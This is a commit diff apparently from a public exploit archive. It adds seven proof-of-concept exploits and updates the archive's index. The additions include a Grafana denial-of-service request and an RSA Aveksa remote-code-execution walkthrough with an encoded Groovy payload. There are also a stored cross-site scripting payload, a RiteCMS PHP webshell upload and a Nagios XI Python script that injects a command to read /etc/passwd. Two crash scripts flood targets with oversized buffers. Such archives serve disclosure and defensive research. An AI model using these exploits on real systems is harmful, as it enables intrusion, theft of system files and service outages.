DB: 2020-07-07

7 changes to exploits/shellcodes Frigate 2.02 - Denial Of Service (PoC) Fire Web Server 0.1 - Remote Denial of Service (PoC) Grafana 7.0.1 - Denial of Service (PoC) File Management System 1.1 - Persistent Cross-Site Scripting RiteCMS 2.2.1 - Authenticated Remote Code Execution RSA IG&L Aveksa 7.1.1 - Remote Code Execution Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
2020-07-07 05:01:57 +00:00 · 2020-07-07 05:01:57 +00:00 · 1bc852d2af
commit 1bc852d2af
parent cf9fbcb5de
8 changed files with 269 additions and 1 deletions
--- a/exploits/linux/dos/48638.sh
+++ b/exploits/linux/dos/48638.sh
@ -0,0 +1,16 @@
+# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
+# Date: 2020-05-23
+# Exploit Author: mostwanted002
+# Vendor Homepage: https://grafana.com/
+# Software Link: https://grafana.com/grafana/download
+# Version: 3.0.1 - 7.0.1
+# Tested on: Linux
+# CVE : CVE-2020-13379
+
+#!/bin/bash
+
+if [[ $1 != "" ]]; then
+    curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
+else
+    echo "Usage: grafana-dos.sh <TARGET>.   Example: grafana-dos.sh http://localhost:3000"
+fi
--- a/exploits/multiple/webapps/48639.txt
+++ b/exploits/multiple/webapps/48639.txt
@ -0,0 +1,58 @@
+# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
+# Date: 2019-04-16
+# Exploit Author: Jakub Palaczynski, Lukasz Plonka
+# Vendor Homepage: https://www.rsa.com/
+# Version: 7.1.1, prior to P02 
+# CVE : CVE-2019-3759
+
+# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)
+
+Information:
+Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution.
+
+1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request:
+https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
+search for "<IFRAME" in source of HTML and note username and password
+
+2. Log into Architect. Sample request:
+POST /aveksaWFArchitect/auth/login/ HTTP/1.1
+Host: AVEKSA_HOST
+User-Agent: python
+wp-product-name: wp-architect
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 146
+Cookie: JSESSIONID=session
+Connection: close
+
+{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}
+
+3. Creating new script that bypasses Java Security Policy and runs "id" system command.
+* "statementText" - contains base64-encoded Groovy code
+* "name" (at the end) - script name that must be unique
+* Save "scriptId" from the response as it is necessary for next request.
+POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
+Host: AVEKSA_HOST
+User-Agent: python
+wp-product-name: wp-architect
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 733
+Cookie: JSESSIONID=session
+Connection: close
+
+{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}
+
+4. Running created script:
+* In the response you have result of your command
+PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
+Host: AVEKSA_HOST
+User-Agent: python
+wp-product-name: wp-architect
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 58
+Cookie: JSESSIONID=session
+Connection: close
+
+{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
--- a/exploits/php/webapps/48635.txt
+++ b/exploits/php/webapps/48635.txt
@ -0,0 +1,45 @@
+# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting
+# Date: 2020-06-30
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage:  https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
+# Software Link:  https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(view_admin.php.php):
+<?php
+require_once("include/connection.php");
+$query="SELECT * FROM admin_login";
+$result=mysqli_query($conn,$query);
+while($rs=mysqli_fetch_array($result)){
+$id =  $rs['id'];
+$fname=$rs['name'];
+$admin=$rs['admin_user'];
+$pass=$rs['admin_password'];
+$status=$rs['admin_status'];
+?>
+<tr>
+  <td width='10%'><?php echo $fname; ?></td>
+  <td align='center'><?php echo $admin; ?></td>
+  <td align='center' width="20%"><?php echo $pass; ?></td>
+  <td align='center'><?php echo $status; ?></td>
+  <td align='center'><a href="#modalRegisterFormsss?id=<?php echo 
+$id;?>">
+  <i class="fas fa-user-edit" data-toggle="modal" 
+data-target="#modalRegisterFormsss"></i> </a> | <a 
+href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i 
+class='far fa-trash-alt'></i></a></td>
+</tr>
+<?php  } ?>
+
+POC:
+
+1. http://192.168.1.58/Private_Dashboard/view_admin.php
+
+2. Add admin click button
+
+3. We write payload in the name section (<script>alert(1);</script>)
+
+4. And view admin click button
+
+5. And our bad payload will be displayed
--- a/exploits/php/webapps/48636.txt
+++ b/exploits/php/webapps/48636.txt
@ -0,0 +1,40 @@
+# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: Enes Özeser
+# Vendor Homepage: http://ritecms.com/
+# Version: 2.2.1
+# Tested on: Linux
+
+1- Go to following url. >> http://(HOST)/cms/
+2- Default username and password is admin:admin. We must know login credentials.
+3- Go "Filemanager" and press "Upload file" button.
+4- Choose your php webshell script and upload it. 
+
+((Example PHP Web Shell Code)) 
+<?php echo "<pre>"; system($_GET['cmd']); ?>
+
+5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php
+6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=whoami
+
+(( REQUEST ))
+
+GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/cms/index.php?mode=filemanager&directory=media
+Connection: close
+Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
+Upgrade-Insecure-Requests: 1
+
+(( RESPONSE ))
+
+HTTP/1.1 200 OK
+Date: Fri, 03 Jul 2020 21:10:13 GMT
+Server: Apache/2.4.43 (Debian)
+Content-Length: 14
+Connection: close
+Content-Type: text/html; charset=UTF-8
+<pre>www-data
--- a/exploits/php/webapps/48640.txt
+++ b/exploits/php/webapps/48640.txt
@ -0,0 +1,52 @@
+# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
+# Date: 2020-04-11
+# Exploit Author: Basim Alabdullah
+# Vendor homepage: https://www.nagios.com
+# Version: 5.6.12
+# Software link: https://www.nagios.com/downloads/nagios-xi/
+# Tested on: CentOS REDHAT 7.7.1908 (core)
+#
+#                 Authenticated Remote Code Execution
+#
+
+import requests
+import sys
+import re
+
+
+uname=sys.argv[2]
+upass=sys.argv[3]
+ipvictim=sys.argv[1]
+
+with requests.session() as s:
+    urlz=ipvictim+"/login.php"
+    headers = {
+        'Accept-Encoding': 'gzip, deflate, sdch',
+        'Accept-Language': 'en-US,en;q=0.8',
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+        'Referer': ipvictim+'/index.php',
+        'Connection': 'keep-alive'
+    }
+    response = s.get(urlz, headers=headers)
+    txt=response.text
+    x=re.findall('var nsp_str = "(.*?)"', txt)
+    for xx in x:
+        login = {
+        'username':uname,
+        'password':upass,
+        'nsp':xx,
+        'page':'auth',
+        'debug':'',
+        'pageopt':'login',
+        'redirect':ipvictim+'/index.php',
+        'loginButton':''
+        }
+        rev=s.post(ipvictim+"/login.php",data=login , headers=headers)
+        cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True)
+        txt1=cmd.text
+        xp=re.findall('var nsp_str = "(.*?)"', txt1)
+        for xxp in xp:
+            payload = "a|{cat,/etc/passwd};#"
+            exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp)
+            print(exploit.text)
--- a/exploits/windows/dos/48613.txt
+++ b/exploits/windows/dos/48613.txt
@ -0,0 +1,31 @@
+# Exploit Title: Frigate 2.02 - Denial Of Service (PoC) 
+# Vendor Homepage: http://www.frigate3.com/ 
+# Software Link Download: http://www.frigate3.com/download/Frigate2.exe
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-22
+# Vulnerable Software: Frigate
+# Version: 2.02
+# Vulnerability Type: Denial of Service (DoS)
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: FrigateCrash.py
+#   2.- Copy content to clipboard
+#   3.- Open "Frigate2.exe"
+#   4.- Go to "Disk" > "Activate Command Line"
+#   5.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
+#   6.- Press Enter from Keyboard.
+#   7.- Click on OK in the dialog box that appears.
+#   8.- Crashed.
+
+
+##################################################################################################################################################
+
+
+#Python "FrigateCrash.py" Code:
+
+f= open("FrigateCrash.txt", "w")
+payload="\x41" * 8000
+f.write(payload)
+f.close()
--- a/exploits/windows/dos/48637.py
+++ b/exploits/windows/dos/48637.py
@ -0,0 +1,20 @@
+# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC)
+# Date: 2020-06-26
+# Exploit Author: Saeed reza Zamanian
+# Vendor Homepage: https://sourceforge.net/projects/firewebserver/
+# Software Link: https://sourceforge.net/projects/firewebserver/files/
+# Version: Pre-Alpha
+# Tested on: Windows 7 , Windows Vista
+
+#!/usr/bin/python
+  
+import socket,os,sys
+
+if len(sys.argv) < 3:
+	print "Usage: python fwspa_dos.py targetIP targetPort"
+else:
+	print "[*] Sending evil http request to target"
+	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+	expl.connect((sys.argv[1], int(sys.argv[2])))
+	expl.send("A"*1015)	
+	expl.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6750,8 +6750,10 @@ id,file,description,date,author,type,platform,port
 44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
-48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
+48613,exploits/windows/dos/48613.txt,"Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
+48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
+48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42889,3 +42891,7 @@ id,file,description,date,author,type,platform,port
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,
 48633,exploits/php/webapps/48633.py,"ZenTao Pro 8.8.2 - Command Injection",2020-07-02,"Daniel Monzón",webapps,php,
 48634,exploits/multiple/webapps/48634.txt,"OCS Inventory NG 2.7 - Remote Code Execution",2020-07-02,Askar,webapps,multiple,
+48635,exploits/php/webapps/48635.txt,"File Management System 1.1 - Persistent Cross-Site Scripting",2020-07-06,KeopssGroup0day_Inc,webapps,php,
+48636,exploits/php/webapps/48636.txt,"RiteCMS 2.2.1 - Authenticated Remote Code Execution",2020-07-06,"Enes Özeser",webapps,php,
+48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,
+48640,exploits/php/webapps/48640.txt,"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution",2020-07-06,"Basim Alabdullah",webapps,php,